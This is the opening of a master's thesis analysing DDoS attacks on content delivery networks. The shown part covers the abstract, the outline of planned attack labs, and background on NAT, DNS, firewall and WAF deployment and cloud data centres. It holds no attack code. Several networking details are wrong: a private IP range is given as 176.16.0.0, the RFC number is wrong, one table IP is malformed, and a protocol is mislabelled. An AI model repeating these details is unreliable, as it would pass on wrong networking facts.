==PAGE:1==
Analysis of DDoS attacks against content de­
livery networks
Master Thesis
DTU Applied Mathematics and Computer Science
Department of Applied Mathematics and Computer Science
==PAGE:2==
==PAGE:3==
Analysis of DDoS attacks against content delivery networks
Master Thesis
January, 2021
By
Zihao Li(s190042)
Technical University of Denmark
Richard Petersens Plads, building 324, 2800 Kongens Lyngby, Denmark
Phone +45 4525 3031
compute@compute.dtu.dk
www.compute.dtu.dk
==PAGE:4==
Approval
This thesis has been prepared over five months at DTU Compute, department of Applied
Mathematics and Computer Science at the Technical University of Denmark, in fulfilment
of requirements for achieving an M.Sc. in Computer Security.
The thesis was conducted during the period between August 2020 and January 2021
with an assigned workload of 30 ECTS credits.
The thesis was conducted under the supervision of Weizhi Meng, Associate Professor
at DTU Compute.
Zihao Li ­ s190042
Signature
Date
17­January­2021
ii
Analysis of DDoS attacks against content delivery networks
==PAGE:5==
Abstract
The thesis provides a concrete analysis of DDoS attack against Content Delivery Network
(CDN) by implementing the complete attacking logic and deploying CDN network as lab
environment. In order to identify possible risks in network applying CDN technique and
propose proper countermeasures, the following chapters will illustrate the up­to­date se­
cure network architecture of operator­class companies, the basic attacking methodology
of DDoS attack and strategies of deploying CDN edge nodes.
Finally, a suggested approach to mitigate DDoS attack was provided when CDN can not
defend flooding in specific situation. Elastic IP rotation (EIR) is a defending mechanism
that works on the origin servers behind CDN. EIR aims to make orgin servers assigned
with dynamic public IP address to extremely increase the attacking costs. There are 5
labs explaining all required details of penetration tests on hosts or servers, DDoS attack
tools, deployment of CDN and proposed countermeasure.
Analysis of DDoS attacks against content delivery networks
iii
==PAGE:6==
Acknowledgements
I would like to thank my supervisor, Weizhi Meng, for his support during the whole period.
He gave me useful advice and valuable inspiration. He also gave me correct directions
so that i could do the research on the domain which I am interested in. Thank him for the
personal and professional conversations within these months.
I would like to thank DTU Compute department for providing me enough education re­
sources and convenience.
iv
Analysis of DDoS attacks against content delivery networks
==PAGE:7==
Contents
Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
ii
Abstract . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
iii
Acknowledgements
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
iv
1
Introduction
1
1.1
Thesis Objectives and contributions
. . . . . . . . . . . . . . . . . . . . . .
1
1.2
Thesis Outline
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
2
2
Enterprise­level network architecture
3
2.1
Background techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
3
2.2
Deployment strategies of FW/IDS/IPS/WAF and analysis of merits and de­
merits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
11
2.3
Analysis of current enterprise network security and IP tracing . . . . . . . . 16
3
Elastic cloud service
18
3.1
Network Architecture and cabling architecture of ALiCloud data center . . . 18
3.2
Elastic cloud server
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
3.3
NAT gateway . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
4
High concurrency problem and introduction of CDN
25
4.1
Highly concurrency problem . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
4.2
Performance optimization of websites
. . . . . . . . . . . . . . . . . . . . . 26
4.3
Introduction of CDN
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
4.4
Lab preparation: deployment of testing target web servers on cloud
. . . . 29
5
Analysis of complete DDoS attack on network applying CDN
34
5.1
Basic attacking methodology of DDoS . . . . . . . . . . . . . . . . . . . . . 34
5.2
Current DDoS defending methods
. . . . . . . . . . . . . . . . . . . . . . . 38
5.3
Zombie host preparation and personal host penetration
. . . . . . . . . . . 41
5.4
Lab1: Penetration test on person host by exploiting system vulnerability IPC$ 42
5.5
Penetration on web servers . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
5.6
Lab2: Penetration test on servers with CMS metinfov5.0 based on variable
overriding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
5.7
UDP DDoS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
5.8
Lab3: DDoS attack conducted by two types of attacking tools . . . . . . . . 68
6
Deployment of CDN edge nodes and risk analysis on CDN
75
6.1
Dynamic IP, static IP, public IP, private IP and Virtual IP
. . . . . . . . . . . 75
6.2
Linux vitual server­load balancing . . . . . . . . . . . . . . . . . . . . . . . . 76
6.3
Load balancing architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
6.4
Current situation of CDN and analysis of CDN working principle . . . . . . . 85
6.5
Lab4: Deployment of CDN edge node . . . . . . . . . . . . . . . . . . . . . 91
6.6
Risk analysis on CDN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
7
Elastic IP rotation against DDoS
95
7.1
Elastic IP address
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
7.2
Elastic IP rotation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96
7.3
Lab5: Elastic IP rotation against DDoS attack . . . . . . . . . . . . . . . . . 97
Analysis of DDoS attacks against content delivery networks
v
==PAGE:8==
8
Conclusion and future work
99
Bibliography
101
vi
Analysis of DDoS attacks against content delivery networks
==PAGE:9==
1
Introduction
In computer science, a denial­of­service (DoS) is a cyber­attack in which services of a
host can be disrupted temporarily by flooding the victim resource with thousands of re­
quests. In a distributed denial­of­service attack(DDoS), the flooding traffic originates from
various sources which could separate all over the world. It is impossible to trace back all
attacking sources and block the traffic. This makes DDoS attack the hard problem in the
world and there is still no solution to completely remove the threat.
DDoS attacks aim at consuming finite network and system resources with a huge amount
of trash data. Network and system have no approach to distinguish between normal traf­
fic and malicious traffic, so they have to deal with allocated resources in any case. Most
DDoS attacks were caused by data transmission protocols. However, some protocols can
be updated to remove potential risks and some can not be modified due to the common
use by a large group of users.
In 2018, Github was hit with a 1.3Tbps DDoS attack which was caused by ”WebStresser”,
an online service permitting any people to launch attacks. Those people do not have to
own domain knowledge about ”Botnet” or writing scripts. In commerce society, there exist
a lot of network companies with their service webs under DDoS attack by their enemies.
But for some of them, they prefer accepting the caused damage rather than spend more
costs figuring out attackers or applying security devices as countermeasures.
With the development of cloud computing and content delivery network, the situation was
changed, most large­sized companies like Amazon, Alibaba, Huawei applied and de­
ployed their own CDN network and they even provide those cloud services to individuals
which significantly improved the current situations. Some other small or medium­sized
companies were still facing the problem of DDoS attack even they had already deployed
CDN nodes to defend attack. A technique blog [adm13] of penetrating a Web server
which applied CDN exposed the whole process of penetration. Both attacking and de­
fending are always developing. This article aims to locate risks in CDN and propose the
corresponding approach by focusing one single point.
1.1
Thesis Objectives and contributions
The main intention is to analyze DDoS attack when target network applying CDN. We aim
to locate risks on real IP address of origin servers and propose mechanism on public IP
of origin servers to defend against DDoS attack. There are 5 objectives in the thesis:
• Most attackers are familiar with the network topology of companies, how they would
deploy routers, switches, firewalls, Web Application Firewalls (WAF), etc. It can
save much attacking costs to target correct victim server. So an analysis of network
devices and their deployment strategies should be provided. To give an overview of
the whole network protection for small or medium­sized companies.
• CDN is a part of the whole secure architecture of a mature enterprise­level network.
So it is necessary to analyze and understand the current secure architecture and its
components to obtain the meaning of CDN.
• Try to highly simulated the network of companies, cloud servers were rented from
Analysis of DDoS attacks against content delivery networks
1
==PAGE:10==
Alicloud, the biggest operator­class network company in China. To get familiar with
the current situation of cloud computing and its defending performance.
• Summarize the attacking methodology of conducting one DDoS attack and figure out
the working principle of hacker­class DDoS tool on dark web. To test its performance
and make a comparison with scripts using person hosts to find out the reason which
caused the difference of bandwidth and traffic.
• Understand the basic working principle behind CDN and which open resources can
be selected to deploy needed network.
• Propose possible solution to mitigate DDoS attack based on potential risk point be­
hind CDN with analysis of deep penetrating attack on web servers.
1.2
Thesis Outline
The thesis is organized in 8 chapters, the details are shown below:
Chapter 1 ­ introduction A brief introduction of the whole paper.
Chapter 2 ­ Enterprise­level network architecture In this part, High available(HA) net­
work with multiple types of security devices will be introduced, and their deployment strate­
gies were given in detail.
Chapter 3 ­ Elastic cloud service Chapter 2 briefly introduced the Elastic cloud ser­
vices provided by Alicloud, all labs were implemented based on cloud servers rented. So
it is necessary to list all used services and know the current defending methods provided
by those companies.
Chapter 4 ­ Performance optimization of website and introduction of CDN This chap­
ter explains the origin of CDN and performance optimization for servers with high payload
and concurrency. Especially load balancing has significant meaning in mitigate large traf­
fic.
Chapter 5 ­ Analysis of complete DDoS attack on network applying CDN In this part,
DDoS attack was analyzed by conducting a complete attack including information collec­
tion(IP tracing), person host penetration by exploiting system vulnerabilities(as zombie
host for botnet), web server penetration by exploiting web vulnerabilities(intrusion from
external network into private network) and using DDoS script and API to launch final at­
tack. Also an analysis of current defending mechanism was given.
Chapter 6 ­ Deployment of CDN edge nodes and risk analysis on CDN Chapter 6
gives the working principle of CDN network by cache optimization and technique details
of configuring CDN edge nodes.
Chapter 7 ­ Elastic IP rotation against DDoS In this part, the possible solution was
proposed to mitigate DDoS attack when CDN edges do not work due to the exposure of
real IP addresses of origin servers.
Chapter 8 ­ Conclusions This part summarizes the conclusions of whole work and pro­
poses possible future work.
2
Analysis of DDoS attacks against content delivery networks
==PAGE:11==
2
Enterprise­level network architecture
This paper aims to analyze the current DDoS attack in real scenarios and provide corre­
sponding possible solutions, so it is necessary to understand the latest enterprise­class
network topology and relevant security network devices. In the following chapters of anal­
ysis of DDoS attack, source public IP address is the most significant part of the complete
DDoS attack.
So at the very beginning of the paper, NAT, DNS and firewall will still
be introduced. To make DDoS attack tests closer to real scenarios, ECS(Elastic Com­
pute Service) provided by Alibaba Cloud were rented. Those entities are instantiation of
IaaS(Infrastructure as a service)[KS18]. IaaS quickly scales up and down with demand,
users only need to pay for the rent of services they need. It helps avoid the costs and
complexity of managing physical devices and data center infrastructure. Services are
offered as separate resource components. Alibaba Cloud network topology has been ab­
stracted to help understand and define the current Enterprise­class network Architecture.
Deployment of web servers as testing targets is based on ECSs, all concrete details have
been documented.
2.1
Background techniques
2.1.1
Network address translation protocol
Network address translation is a way to remap an IP address space into another. Usually,
NAT remaps a public IP addresses into a private IP address space to avoid IPv4 address
exhaustion. Private IP addresses are not allowed to exist in public network which means
private IP addresses can be reused in private networks. Private IP addresses are spec­
ified in RFC 1978, there are three ranges of addresses which can be used in a private
network:
• 10.0.0.0­10.255.255.255
• 176.16.0.0­172.31.255.255
• 192.168.0.0­192.168.255.255
Normally, network address translation can be implemented by modifying address in IP
header of packets when they are in transit across routing devices like routers or fire­
walls(layer 3 switch not suggested).
Implementations of network address translation are mainly divided into 3 categories: static
NAT, dynamic NAT and PAT [Cer17].
Static NAT refers to one­to­one NAT, in this type NAT, a specified private IP address
is mapped to another specified public IP address where the public IP address is always
the same IP address. This basic NAT allows an internal host like a web server to be ac­
cessed by public network over the internet.
Dynamic NAT refers to one­to­many NAT, all private IP addresses authorized to access
the internet would be randomly converted to any specified legal IP address which means
dynamic translation can be done as long as administrator specifies which internal ad­
dresses can be translated and which legal addresses can be used as external addresses.
Dynamic NAT can use multiple legal external IP addresses sets.
Analysis of DDoS attacks against content delivery networks
3
==PAGE:12==
PAT(port address translation) allows multiple users within a private network to make
most of a small number of IP addresses which permits devices within a local area net­
work to be mapped to a single public IP address with different port numbers. All hosts
in the same local area network are sharing the same public IP address and accessing
the external network simultaneously, each host has a unique internal address and routers
dynamically generate port numbers(0­65535) when PAT is implemented.
All network address translations are based on NAT table which take places in the router
or NAT­enabled devices when packets arrive or leave interfaces. Before implementing
NAT, internal and external networks should be defined. From internal network to external
network, source IP address will be translated. From external network to internal network,
destination IP address will be translated. In conclusion, PAT is suitable in scenario that
hosts in internal network want to get access to internet and static NAT is used for pub­
lishing web services to the external network. For network security, usually, only one port
will be translated and published. For example, a network company has established a web
server with private IP 192.168.1.3 and rented a public IP 100.1.1.2 by ISP(internet service
provider). In NAT table, there is one entry “192.168.1.3:80 – 100.1.1.2:80“. Due to the
overloading technology, private 80 port can be mapped as any other ports as well instead
of only 80 port. So after establishing domain name service(DNS), this inner web server
can be accessed by anyone over the internet by visiting its domain name. The basic logic
of was shown in figure 2.1 and the concrete configuration in routers was shown in figure
2.2.
Figure 2.1: Working position of NAT in network topology
4
Analysis of DDoS attacks against content delivery networks
==PAGE:13==
Figure 2.2: The configuration of NAT in routers
According to the current market, when a company rents a public IP address and a high
enterprise­class server bandwidth from ISP(internet service provider), ISP will provide
virtual public IP addresses sets as well for mapping multiple web servers inside the internal
company network. But the prices is expensive which was shown in figure 2.3.
Figure 2.3: Working position of NAT in network topology
Besides above, NAT has 2 modes: DNAT (destination network address translation)
and SNAT (source network address translation) [Bha20], DNAT aims to provide local
web services over the internet by port mapping and IP mapping. After port or IP mapping,
NAT gateway will forward requests with specified protocol, IP and port to the servers inside
private network. SNAT aims to provide proxy service of accessing public network for hosts
inside the private network without public IP address. SNAT translates private IP address
of hosts into SNAT public IP so that private hosts can have identities to access the internet.
After IP and port mapping, NAT gateway will forward requests of accessing DNAT IP with
Analysis of DDoS attacks against content delivery networks
5
==PAGE:14==
specific protocol and port to the server in private network with specific protocol and port.
Examples were shown in table 2.1. For entry No.1, NAT gateway will forward requests to
Forwarding Entry
Public IP
Public Port
Private IP
Private Port
protocol
NO.1
1.x.x.x
80
192.1681.1.1
80
TCP
NO.2
2.x.x.x
8080
192.168.1.2
8000
UDP
NO.3
3.x.x.x
Any
192.168.1.3
Any
Any
Table 2.1: example of DNAT entries
1.x.x.x(TCP port 80) to TCP port 80 of server with IP 192.168.1.1. For entry No.2, NAT
gateway will forward requests to 2.x.x.x(UDP port 8080) to TCP port 8000 of server with
IP 192.168.1.2. For entry No.3, NAT gateway will forward any requests to 3.x.x.x to server
with IP 192.168.1.3.
2.1.2
Domain name service
Domain name service is an important service of the internet which serves as a distributed
database mapping domain names and IP addresses. DNS makes it easier to access in­
ternet and do not have to remember the exact string of IP.
Due to the large number of internet users, internet uses a hierarchical tree­like naming
method [Bel20]. Any host or router connected to the internet has a unique hierarchy name.
So domain name is a manageable division in the namespace. Syntaxally, each domain
name is made up of a series of labels separated by dots. Domain names can be divided
into sub­domain names, sub­domain names can continue to be divided into sub­domain
names, thus forming a hierarchy which was shown in figure 2.4:
Figure 2.4: Domain name hierarchy
Domain name is a hierarchical structure, domain name server is also the corresponding
hierarchy. DNS server is used to resolve the domain name which involves 4 types:
1. root DNS server: when the local domain name server does not query the resolution
6
Analysis of DDoS attacks against content delivery networks
==PAGE:15==
results locally, the first step is to query it and get the IP address of the top­level domain
name server. There are 13 root servers in the world.
2. Top­level DNS server: The second level domain name registered under the top­level
domain name server, such as “example.com”. and “.com” is the top­level domain name.
When queried, “example .com” is located and will be returned to top­level DNS server.
3. Authoritative DNS server: Authoritative DNS server is unique in a particular region
and responsible for maintaining the correspondence between domain names and IP ad­
dresses within that region.
4. Local DNS server: local DNS responds to the recursive requests from clients and
eventually tracks them until the resolution results are obtained.
The result of DNS queries are typically cached in the local DNS servers, if there is a
cache in the local domain name server, the following DNS query steps are skipped and
the resolution results are returned quickly. A whole DNS resolution process usually has
8 steps:
1. User types “example.com” in web browser, the local DNS server began to query recur­
sively.
2. Local DNS server uses iterative query to the root domain name server.
3. Root DNS server tells the local DNS server, the next step should be to query the IP
address of .com TLD.
4. Local DNS servers query .com TLD.
5. .com TLD tells local DNS servers, the next step should be to query the IP address of
example.com authoritative DNS server.
6. Local DNS server sends queries to authoritative DNS servers.
7. Example.com authoritative DNS server tells local DNS servers IP address of queried
hosts.
8. Local DNS server finally sends IP address of queried results back to web browser.
9. Once IP address of example.com has returned, web browser will send HTTP requests
to the IP address.
10. Content of websites shows up.
The diagram of whole process is shown in figure 2.5.
Analysis of DDoS attacks against content delivery networks
7
==PAGE:16==
Figure 2.5: The process of DNS query
2.1.3
Firewall
Firewall is a system to prevent unauthorized access to or from a private network, which
can be deployed in the form of hardware or software [Cis20a]. For personal hosts, it is
a software system which executes blacklist and whitelist strategies to monitor and filter
network flows. As for enterprise­class network, it is a hardware which can replace routers
completely. Usually, firewall as a network security device forwards flow based on IP ad­
dress(layer 3) and ports(layer 4). Its basic functions are:
Access control: all security softwares (such as password, encryption, identity authenti­
cation, audit, etc. ) can be configured on the firewall. Compared with all network security
issues dispersed to each host, the centralized firewall security management is more eco­
nomical.
Attack protection: firewall as a blocking point can block access to a protected private
network by dropping all packets with limited ports. It is impossible for an attacker to exploit
vulnerabilities of the operating systems. However, firewalls just take the attacks first, if
the attacking flow is too huge which can crash down the firewall or there exists vulner­
abilities in firewall, hackers use firewall­bypass scripts to penetrate into inner networks.
8
Analysis of DDoS attacks against content delivery networks
==PAGE:17==
Private network security can not be guaranteed. For example, the parameters of a type
of Cisco firewall has been shown in figure 2.6, it has 3000 Mbit/s throughput. Normally,
a firewall has more bandwidth when it has higher throughput, but current hackers have
DDOS tools with rates of flow higher than 100Gbit/s even 1Tbit/s by servers or rookie
clusters they established.
Figure 2.6: Detailed information of CISCO firewall on Amazon
Routing switching: Compared with routers which can only work in layer 3(network layer),
firewall has more types and can be deployed in layer3(network layer), layer4(transport
layer) and layer7(application layer). Concrete details of how to deploy firewalls in enterprise­
level network will be explained in the following parts.
Log recording: All legal access go through firewall, then it can record those access
history and document those information into logs. Logs provide source and destination IP
addresses, protocols, port numbers, fingerprints of access hosts and even marked key­
words in payload. When suspicious actions occur, firewalls can make alarms and provide
details of traffic about whether the monitored network is being under attack, it is important
to collect information on the use or misuse of a network as well. Network usage statistics
is significant for demand analysis and threat analysis of a network.
NAT: Firewall translates the internal network IP address, using its own IP address to
replace the source address of private servers to send data to the external network. When
the response data traffic returns, firewall will replace the destination address with the
source address of private servers which enhances the security protection of the private
IP addresses.
VPN: In addition to the security functions, firewall also supports the enterprise internal
network technology system with internet services VPN.
According to the current market, firewalls can be divided into 5 major categories:
Analysis of DDoS attacks against content delivery networks
9
==PAGE:18==
Packet filtering firewall: packet filtering firewall works between layer 3(network layer) and
layer 4(transport layer). Based on the IP address of the data source and destination IP
addresses, protocol types and ports, corresponding legal data flow can be passed. This
type of firewall has simple functions but with complicated configuration. It requires con­
crete complex pass strategies to be set manually.
Proxy firewalls: it protects network by filtering messages at layer 7(application layer).
In addition to to intercepting requests and responses, it also monitors incoming traffic for
application layer protocols(HTTP and FTP). Proxy firewall aims to protect hosts in private
network, so it acts as servers for inner hosts and acts as inner hosts for external servers
which means it has to maintain two sessions perform operations on packets from both
sides. So its working efficiency has been reduced. The initial intention is to hide private
IP addresses. But with development of NAT, this type of firewall has not been used com­
monly. The advantages are high safety and content detection. However, its disadvantage
is low scalability.
Stateful­inspection firewall: stateful filtering firewall [Rou11] is the top trending firewall
with high speed, simple configuration and multiple functions. It monitors the full state of
active network connections, constantly analyzing traffic and data packets. For the new
packets flow through the firewall, as shown in figure 2.7, they have to pass through the
firewall strategies. All illegal packets will be blocked and dropped. Firewall separates the
internal and external networks. So if setting the routing table for firewall, all data flow will
go straight forward to the default routing S* which leads to the external network segment.
Then before packets sent out, packets will be modified due to PAT. All source IP addresses
and ports of private hosts or servers will be replaced by attributes of outgoing interface.
Firewall will generate new random port number as source port. Afterwards, dataframes
will be reencapsulted as well. Source MAC address will be replaced with MAC address
of outgoing interface. Finally, all information of this session will be recorded in state table
for the convenience of use next time. When packets with the same source IP, destina­
tion IP, source port and destination port wants go through firewall again, firewall inspects
stable table and records are detected, then packets can directly pass through state fire­
wall without checking strategies and other operations again. When external servers reply
packets which satisfy state features in state table, packets will be directed passed. State
mechanism has the highest privilege. To protect private network, it is required to write
only incoming strategies on firewall to drop all packets wanting to access internal network
actively.
10
Analysis of DDoS attacks against content delivery networks
==PAGE:19==
Figure 2.7: The process of traffic flowing in stateful­inspection firewall
Application layer firewall (Deep packet Inspection): compared with proxy firewall, it
just performs transparent forwarding of data packets but perform data filtering on appli­
cation layer with a high speed. However, compared with pure IPS(intrusion prevention
system). It has limited effects that this firewall embeds IPS or IDS(Intrusion detective sys­
tem) module into firewall. Small or medium size enterprise prefer to selecting this kind of
firewall to save money. So it is also called integrated gateway. It is not common because
packets filtering can not get rid of layer 3 and layer 4 in a short time.
2.2
Deployment strategies of FW/IDS/IPS/WAF and analysis
of merits and demerits
The most common network security products on the market can be divided into 4 cate­
gories: basic firewall and next generation firewall, intrusion detective system, intrusion
prevention system and web application firewall. This part will explain differences of those
devices and provide basic deployment strategies of those security devices [che17].
2.2.1
Deployment of firewall
As mentioned above, the main function of basic firewalls is to limit access to specified
IP and port. Basically, the implementation is based on shutting down all active incoming
access and only allowing data flow satisfies access strategies. A next­generation firewall
as a third generation of firewall which combines a traditional firewall with parts of other
network filtering devices (deep packet inspection, intrusion detective system and intrusion
prevention system). This type of firewall can intercept attacking behaviors from bottom
layers but can not handle attacks from top layers. When company needs to publish web
servers over the internet, it is necessary to deploy demilitarized zone (a physical or logi­
cal subnetwork containing and exposing external­facing services). DMZ aims to provide
Analysis of DDoS attacks against content delivery networks
11
==PAGE:20==
another layer of security for local area network and its basic function is to act as a small,
isolated network placed between private network and the internet.
Generally, The common deployment location of firewall is the external outlet or zone outlet
position which can safely isolate the internal and external data flow. Firewall has 3 types
of working modes deciding how to conduct the deployment concretely [Cis20b]:
1. Transparent mode: when firewall works in transparent mode, it will not change the
logic network topology, firewall can be set underlying switches to protect servers. As
shown below, in this network structure, a specific router will conduct PAT for the private
network, at this moment, all working interfaces of firewall work on layer 2(data link layer).
All interfaces will not be assigned IP addresses that firewall sacrifices functions of routing,
VPN and etc. The network topology of deployment was shown in figure 2.8.
Figure 2.8: Deployment strategy of firewall in transparent mode
2. Routing mode: Routing mode is also called NAT mode, when analyzing stateful in­
spection firewall, that scenario applied NAT mode, firewall uses its own IP address to
replace source IP address of the outgoing packets. When reply traffic arrives firewall, it
replaces destination IP address with source IP addresses of hosts. As figure shown be­
low, DNAT was implemented between DMZ and public internet. SNAT was implemented
between internal network and public internet which means DMZ can only provide TCP
services for external network and internal network can only access the public internet.
Figure 2.9 showed the network topology.
12
Analysis of DDoS attacks against content delivery networks
==PAGE:21==
Figure 2.9: Deployment strategy of firewall in routing mode
3. Hybrid mode: It combines transparent mode and routing mode. Firewall can totally
substitute a layer 3 switch which embeds a layer 3 router and a layer 2 switch. When using
this kind of multilayer device, there exist virtual interfaces(not exist physically) can be used
when setting configurations. So as figure shown below, DMZ is directly connected to the
internet but firewall executing SNAT between internal network and the internet. Figure
2.10 showed the network topology.
Figure 2.10: Deployment strategy of firewall in Hybrid mode
Analysis of DDoS attacks against content delivery networks
13
==PAGE:22==
2.2.2
Deployment of intrusion detective system
Intrusion detective system is designed for monitoring and identifying active unauthorized
system access or manipulation. It inspects all the inbound or outbound network activity.
However, it can not block malicious traffic by itself. The deployment of IDS varies de­
pending on the network. Usually, the most common placement is behind the firewall on
the edge of the internal network, in parallel with the traffic(placed out­of­band). so that
IDS can have high visibility of traffic entering private network. The feature is that IDS will
not block any traffic between internal and external network. The concrete deployment is
shown in figure 2.11.
Figure 2.11: Deployment strategy of IDS in enterprise network
2.2.3
Deployment of intrusion prevention system
Compared with IDS, IPS not only detects and identifies threats, but also looking for possi­
ble malicious contents in traffic and capturing information about them. The main difference
between them is that IDS is just a monitoring system but IPS is a control system which
prevents data packets based on the payload in packets. So deployment of IPS is totally
different from IDS, the network placement for IPS is in­line(in­series) with network traffic
as shown in figure 2.12.
14
Analysis of DDoS attacks against content delivery networks
==PAGE:23==
Figure 2.12: Deployment strategy of IPS in enterprise network
2.2.4
Deployment of web application firewall
Web application firewall as an active security product has a strong pertinence for pro­
tocols. WAF is focusing on HTTP/HTTPS protocol. Other active security products like
DAF(database application firewall) is responsible for SQL queries. All other unrecog­
nized business access will be isolated. WAF works on layer 7(application layer) with a
deep understanding on web application business and logic. WAF performs content de­
tection and validation on all kinds of requests from web application clients to ensure their
security and legitimacy, and blocks illegal requests in time, so as to protect all kinds of
websites effectively.
About placement of WAF. Typically, WAF is placed in the DMZ area where an enter­
prise provides web services to the external network or in the data center service area, or
in series with gateway devices such as firewalls or IPS mentioned above. In summary,
the placement of WAF deployment is determined by the position of the web servers. In
principle, keep WAF as close to the web servers as possible.
WAF has 4 modes: transparent proxy mode, reverse proxy mode, routing proxy mode and
port mirroring mode. The first modes are called in­line modes as well. In common case,
WAF requires to be deployed in­series with front­end of web servers for traffic anomaly
detection and interception. Port mirroring mode is also called offline mode, its deployment
is quite simple, WAF should be placed in­parallel with servers directly connected to the
switch aiming to detect abnormal traffic.
Transparent proxy mode: When web clients send connection requests to the servers,
TCP connection request is intercepted and monitored by WAF, WAF secretly proxys the
session between web clients and servers, split the session into two segments and for­
wards them in bridge mode. From the point of view of web clients, web clients are still
Analysis of DDoS attacks against content delivery networks
15
==PAGE:24==
accessing servers and do not perceive the existence of WAF. WAF forwarding is the same
as transparent bridge forwarding, so it is called transparent proxy mode and transparent
bridge mode. The deployment of WAF is easy which was shown in figure 2.13.
Figure 2.13: Deployment strategy of WAF in enterprise network
Reverse proxy mode: Reverse proxy mode means mapping IP addresses of real servers
on the reserve proxy servers. At this moment, proxy server acts as a real server to the
external network. When proxy server receives HTTP request datagrams, it will forward
them to the real servers. Back­end servers receive requests and send response to WAF
which sends this reply to clients. Compared with transparent proxy mode, reverse proxy
mode requires IP mapping on WAF. This deployment pattern requires modifications on
the network structure and its configuration is relatively complex. In addition to configuring
IP address and routing, it also needs to configure the mapping relationship between IP
address and virtual address of the real back­end servers. Besides that, if the IP address
of original server is a global IP address(without NAT translation), it is necessary to modify
the IP address and DNS resolution address of the original server. The merit of this mode
is load balancing on WAF.
Routing proxy mode: The only difference between routing proxy mode and transpar­
ent mode is that it WAF forwards traffic in routing forwarding mode rather than bridge
mode. This mode requires to set IP addresses and routing of the inbound and outbound
ports of WAF. When working in routing proxy mode, WAF act directly as a gateway to
web servers, but if there is a single point of failure in the network, WAF is responsible for
forwarding all traffic. This mode does not support server load balancing.
Port mirroring mode: When WAF works in port mirroring mode, WAF only monitors
and alarms HTTP traffic without intercepting and blocking them. This mode requires the
use of switch’s port mirroring function, which mirrors HTTP traffic on switch’s port to WAF.
The deployment does not make any changes on the network, WAF only analyzes and
records traffic.
2.3
Analysis of current enterprise network security and IP
tracing
Highly available firewall is also called hot­standby firewall. Usually, Enterprise­class net­
work topology will apply this deployment strategy for strengthened security in which two
firewalls are placed in a group and their configurations should be synchronized to prevent
16
Analysis of DDoS attacks against content delivery networks
==PAGE:25==
one single point of failure on the whole network [Qft20]. This article will not focus on how
HA firewall based on VRRP(virtual router redundancy protocol) works but emphasizes se­
curity level of enterprise­class network. Nowadays, those defending devices and meth­
ods are relatively mature. For those international great companies with sufficient fund,
it is almost impossible for individuals to conduct DDOS attacks on those servers. They
have enough financial power to rent multiple types of security devices or even outsource
security business to telecommunication operators. Large enterprises forward traffic to
telecommunication companies for intelligent flow cleaning.
The same way, DDOS attack is a kind of resource consumption attack. Establish servers
with wider bandwidth to send much more traffic. With more rookie clusters or server clus­
ters, attack will become more powerful.
However, for those small or medium size network companies, they do not have such
fund to rent devices and build solid protection layer for private network. It is possible for
attackers to find vulnerabilities with bypass traffic entering into the network. As long as
public IP address of real servers was exposed, web servers which provide services over
the internet could be crashed down in seconds. The following parts will focus more on
tracing IP servers and offer different methods to hide real IP addresses.
Analysis of DDoS attacks against content delivery networks
17
==PAGE:26==
3
Elastic cloud service
AliCloud as the most famous Chinese cloud computing company, it provides solid cloud
computing services to online business and Aliaba’s own e­commerce system. All cloud
services are available including Elastic Compute, Data Storage, Relational Databases,
Content Delivery Networks, Anti­DDoS protection and Big­Data processing. This article
aims to conduct and analyze DDoS attack in real scenarios, real web servers and websites
need to be established as attacking targets. So in lab parts, cloud devices and services
should be rented for simulation experiment. All highly­relevant products will be introduced
in the following parts.
3.1
Network Architecture and cabling architecture of
ALiCloud data center
In a data center network architecture, usually, the uplink ports of servers use TCP/IP
protocols for data transmission, the whole network may include access switching layer,
distribution access switching layer, core switching layer, routing layers and etc. For those
part of the network layers which all use TCP/IP protocol for data transmission, they can
be called as LAN network, the LAN network layer of traditional data center is shown in
figure 3.1.
18
Analysis of DDoS attacks against content delivery networks
==PAGE:27==
Figure 3.1: Traditional network architecture of data center
The multilayer design promotes link efficiency and redundancy. For this hierarchy, each
layer has specific role [fen17].
Core layer: Core switching layer works in the backbone for load balancing, fast con­
vergence and scalability. It requires high speed service without any policy enforcement.
So core switches normally have much higher prices.
Distribution layer: This layer utilizes IGP(interior gateway protocol) for benefits like load
balancing and fast convergence. Its main function is to aggregate the access layer ele­
ments.
Access layer: Access switching layer is used to switch in wiring closet and act as the
network trust or policy boundary.
With the adoption of a huge number of virtualization technologies in cloud computing
data centers, LAN network layer has a new architecture. The development of virtualiza­
tion technology can improve the latency of network nodes. Low latency of network is the
basic requirement of the development of cloud computing data center, so more and more
data centers adopted Fabric network architecture. Thus, network architecture is reduced
from traditional three­layer network architecture to the two­layer network architecture and
the connection between various network devices will become more complex. As shown
in figure 3.2, due to the increase of data center density, traditional HDA(Horizontal Distri­
Analysis of DDoS attacks against content delivery networks
19
==PAGE:28==
bution Area) and EDA(Equipment Distribution Area) will have the trend of fusion. Under
TOR(top of rack) architecture mode, HDA and EDA will no longer be clearly distinguished.
Figure 3.2: Current network architecture of data center
AliCloud owns the operator­class computer houses and equipment with BGP(border gate­
way protocol) 8 lines of exclusive bandwidth and up to 1000 G fiber access. Its products
are highly reliable for clients and for labs as well.
3.2
Elastic cloud server
Cloud server ECS(Elastic Compute Service) is an IaaS(Infrastructure as a Service) level
cloud computing services provided by AliCloud with excellent performance, stable relia­
bility and elastic scalability [Ali20a]. Cloud server ECS eliminates the early preparation for
IT hardware purchasing, enabling to use the server as public resources. IaaS is a popu­
lar service model which provides network infrastructure as a service over the internet. It
charges customers based on how much resources they actually need. In this model, a
